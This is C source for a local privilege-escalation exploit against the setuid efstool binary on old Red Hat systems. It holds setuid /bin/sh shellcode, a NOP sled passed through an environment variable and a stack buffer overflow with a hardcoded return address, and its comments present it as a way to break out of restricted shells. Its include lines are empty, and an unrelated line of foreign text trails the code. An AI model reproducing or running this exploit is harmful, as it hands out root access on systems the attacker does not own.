/* efstool Local root exploit for redhat */ /* Requires efstool to be +s for root exploitation */ /* A good way to break from restricted Shells... */ /* Tested on Redhat 7.1/2/3 */ /* c0w_d0g3@yahoo.co.uk */ /* uk2sec */ /* http://oakey.no-ip.com:82/uk2sec/ */ /* kiddie:password */ #include #include #include /* c0w_d0g3@yahoo.co.uk */ /* Include libraries */ /* This is LINUX setuid /bin/sh shellcode */ int main() { char linuxshellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; unsigned long sp(void) { __asm__("movl %esp, %eax"); } /* This returns the stack pointer and lets us put it into esp*/ char buffer[3000]; long esp = sp(); long retaddr = 0xbfffff8a; /* The return address */ int padding = 2684; char shell[512]; printf("c0w_d0g3 uk2sec\n"); printf("\nThis is a local exploit for /usr/bin/efstool\n"); printf("\nEnsure efstool is +s or you'll not get far\n"); printf("\n The stack pointer is at : %x\n", esp); printf(" The return address is at : %x\n", retaddr); /* Building the buffer */ bzero(&buffer, sizeof(buffer)); memset(buffer,'A',padding); //size of buffer *(unsigned long *)(buffer+strlen(buffer))=retaddr; //return address printf("\nthe ret is : 0x%x", retaddr); memset(shell,0x90,100); memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode)); memcpy(shell,"SHELLCODE=",10); putenv(shell); execl("/usr/bin/efstool", "efstool", buffer, NULL); }

亚洲欧美在线